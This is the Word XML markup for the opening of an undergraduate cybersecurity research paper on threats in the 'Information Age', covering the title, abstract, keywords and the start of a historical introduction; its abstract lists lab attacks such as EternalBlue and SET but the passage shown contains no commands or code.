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466298" w14:textId="77777777" w:rsidR="005D3C33" w:rsidRDefault="00B80A9B" w:rsidP="00403E69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk7286871"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Cybersecurity Threats</w:t>
      </w:r>
      <w:r w:rsidR="00B9708C">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Mitigation Techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B9708C">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">thin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D08129" w14:textId="707A4217" w:rsidR="00403E69" w:rsidRDefault="00B80A9B" w:rsidP="00403E69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="005D3C33">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Age’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7CF38" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:sectPr w:rsidR="00403E69">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="8192"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D58290" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Paul M Lawrence (P152216) Undergraduate Student, BSc (Hons) Computer Networks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFECBBD" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>University of Wales Trinity St David, Swansea, SA1 Waterfront Campus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB1469" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:pStyle w:val="Affiliation"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>plawrence.152216@student.uwtsd.ac.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAD8A3" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69"/>
    <w:p w14:paraId="7A45AC8B" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:sectPr w:rsidR="00403E69">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360" w:charSpace="8192"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF94DB3" w14:textId="1AD1C18B" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">research </w:t>
      </w:r>
      <w:r w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>paper outlines</w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ongoing cybersecurity threats within the modern ‘Information Age’ we all live in today, that could lead to future cyberwars</w:t>
      </w:r>
      <w:r w:rsidR="00C71A96" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002A462B" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> research in this area includ</w:t>
      </w:r>
      <w:r w:rsidR="00C71A96" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="002A462B" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first known cyberwar attack</w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A462B" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">‘Stuxnet’ and the most recent major cybersecurity attack that crippled most of Europe’s institutions ‘WannaCry’, state sponsored elite hacking groups were also </w:t>
      </w:r>
      <w:r w:rsidR="00413C8E" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>researched</w:t>
      </w:r>
      <w:r w:rsidR="002A462B" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>along with future cybersecurity trends</w:t>
      </w:r>
      <w:r w:rsidR="002A462B" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as the advent of 5G</w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the lack of network security within the majority of IoT devices connected to the Internet</w:t>
      </w:r>
      <w:r w:rsidR="00413C8E" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> that could lead to further attacks on vulnerable devices</w:t>
      </w:r>
      <w:r w:rsidR="00C71A96" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, The convergence of Machine 2 Machine (M2M) learning and semi-Artificial intelligent IoT devices</w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00155398" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Four practical</w:t>
      </w:r>
      <w:r w:rsidR="009D5BF0" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> network attacks were conducted </w:t>
      </w:r>
      <w:r w:rsidR="00155398" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>within; ‘Remote Exploitation’ and ‘Information Gathering’, utilising ‘Eternal Blue and Nmap’, WLAN social engineering attack utilising the Social Engineering Toolkit (SET), undetectable ‘Trojan Horse’ malware and evasion techniques utilised by hackers around the world</w:t>
      </w:r>
      <w:r w:rsidR="004C0DD9">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the ‘Tor’ network and Proxy chaining</w:t>
      </w:r>
      <w:r w:rsidR="00155398" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. An IoT University ‘Smart Campus’ was also created </w:t>
      </w:r>
      <w:r w:rsidR="00C71A96" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">within Cisco Packet Tracer (PT) </w:t>
      </w:r>
      <w:r w:rsidR="00155398" w:rsidRPr="004736E3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>and secured from cybersecurity attacks utilising industry best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026B9F3" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="10"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B864AA" w14:textId="7D121812" w:rsidR="00403E69" w:rsidRPr="004C0DD9" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326F80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Keywords-component;</w:t>
      </w:r>
      <w:r w:rsidR="00326F80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C0DD9" w:rsidRPr="004C0DD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M2M, IoT, Cyberwarfare, WannaCry, Stuxnet, Information Gathering, 5G, Bots, Hivenets, Malware, Future Cybersecurity Trends, ‘Information Age’ WLAN’, Tor, Kali Linux, Advanced Persistent Threat Groups, Intrusion Prevention System, AES-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA88E0" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A61DF47" w14:textId="78983BFB" w:rsidR="00403E69" w:rsidRPr="005D1DD1" w:rsidRDefault="00403E69" w:rsidP="00F04738">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction </w:t>
      </w:r>
      <w:r w:rsidR="00F04738">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F04738">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="005D1DD1">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Information Age</w:t>
      </w:r>
      <w:r w:rsidR="00F04738">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62F9B8" w14:textId="18015593" w:rsidR="00563B41" w:rsidRDefault="005D1DD1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Throughout modern human history</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>ve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> been many ages that are defined by the advances within human knowledge within </w:t>
      </w:r>
      <w:r w:rsidR="007E1616">
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>milestones within history</w:t>
      </w:r>
      <w:r>
        <w:t>, such as</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">the Stone Age, </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bronze Age, the Iron Age</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Industrial </w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t>Revolution. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hese </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">periods </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve"> time </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">were </w:t>
      </w:r>
      <w:r w:rsidR="00A80D3F">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">defined and still remembered today because of the prosperity and advancement in human civilisation that </w:t>
      </w:r>
      <w:r w:rsidR="00AA0A4B">
        <w:t>these</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve">newly found </w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t>technologies</w:t>
      </w:r>
      <w:r w:rsidR="00AA0A4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">at each of these </w:t>
      </w:r>
      <w:r w:rsidR="00A80D3F">
        <w:t xml:space="preserve">historic </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">times </w:t>
      </w:r>
      <w:r w:rsidR="00AA0A4B">
        <w:t>brought</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AA0A4B">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r>
        <w:t>dramatically impacted and changed people’s lives</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve"> and human evolution at each juncture </w:t>
      </w:r>
      <w:r w:rsidR="00A80D3F">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve"> these ages</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1111/j.1467-9973.2010.01651.x","ISSN":"00261068","abstract":"Abstract:  In the past, major scientific and technological revolutions, like the Copernican Revolution and the Industrial Revolution, have had profound effects, not only upon society in general, but also upon Philosophy. Today's Information Revolution is no exception. Already it has had significant impacts upon our understanding of human nature, the nature of society, even the nature of the universe. Given these developments, this essay considers some of the philosophical contributions of two “philosophers of the Information Age”—Norbert Wiener and Luciano Floridi—with regard to the nature of the universe, human nature, the nature of society, and the nature of “artificial agents” such as robots, softbots, and cyborgs.","author":[{"dropping-particle":"","family":"Bynum","given":"Terrell Ward","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Metaphilosophy","id":"ITEM-1","issued":{"date-parts":[["2010"]]},"title":"Philosophy in the information age","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=8ea25958-04ed-414d-bb67-91ea4d99ca15"]}],"mendeley":{"formattedCitation":"[1]","plainTextFormattedCitation":"[1]","previouslyFormattedCitation":"[1]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F118710" w14:textId="77777777" w:rsidR="00563B41" w:rsidRDefault="00563B41" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FAE74F" w14:textId="72130772" w:rsidR="005D1DD1" w:rsidRDefault="009570DD" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="00AA0A4B">
        <w:t xml:space="preserve"> these technologies did not just </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provide better living standards for </w:t>
      </w:r>
      <w:r w:rsidR="00A80D3F">
        <w:t>the human civilisation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>but also a lot of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wealth </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> more importantly power to the people and</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>/or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> governments who understood </w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4D">
        <w:t xml:space="preserve">the importance of these technologies </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and utilised </w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4D">
        <w:t>them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to their full potential</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve"> whom also realised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>that the technologies could be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">harnessed </w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means of </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">gaining </w:t>
      </w:r>
      <w:r w:rsidR="00ED6F4D">
        <w:t>global power and greed</w:t>
      </w:r>
      <w:r w:rsidR="00A80D3F">
        <w:t xml:space="preserve"> which evidently lead to wars</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B187E" w14:textId="77777777" w:rsidR="005D1DD1" w:rsidRDefault="005D1DD1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04971DCD" w14:textId="0F890A2B" w:rsidR="00563B41" w:rsidRDefault="005D1DD1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The age we live in today is referred to as</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Information Age’</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">this current period of time in human civilisation was </w:t>
      </w:r>
      <w:r w:rsidR="00BD31F1">
        <w:t>coined</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> many </w:t>
      </w:r>
      <w:r w:rsidR="00D00B23">
        <w:t>years after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00547DDC">
        <w:t>conception</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the World Wide Web (WWW) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the Internet</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00547DDC">
        <w:t xml:space="preserve">that was created </w:t>
      </w:r>
      <w:r w:rsidR="004648ED">
        <w:t>in 1989</w:t>
      </w:r>
      <w:r w:rsidR="00547DDC">
        <w:t xml:space="preserve"> by Sir Tim Berners-Lee</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>he WWW</w:t>
      </w:r>
      <w:r w:rsidR="009570DD">
        <w:t xml:space="preserve"> interconnected Local Area Networks (LAN) across vast distances to create Wide Area Networks (WAN)</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00893019">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Sir Tim Berners-Lee invented the World Wide Web in 1989","author":[{"dropping-particle":"","family":"World Wide Web Foundation","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Web","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"title":"History of the Web","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=8748f2a7-e444-473f-b470-7fd701f16f52"]}],"mendeley":{"formattedCitation":"[2]","plainTextFormattedCitation":"[2]","previouslyFormattedCitation":"[2]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00893019">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00893019">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B018B50" w14:textId="77777777" w:rsidR="00563B41" w:rsidRDefault="00563B41" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77875961" w14:textId="6040E951" w:rsidR="008750C1" w:rsidRDefault="00563B41" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">hen governments and </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">corporations </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">realised </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>Internet’s far</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">reaching potential to not only improve </w:t>
      </w:r>
      <w:r w:rsidR="004464CD">
        <w:t>people’s</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> lives</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">further </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>enhance the evolution of humans</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> but</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> just like the ages that came before</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>, governments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>corporations</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> and/or malicious actors soon realised that the now Internet can </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>be harnessed</w:t>
      </w:r>
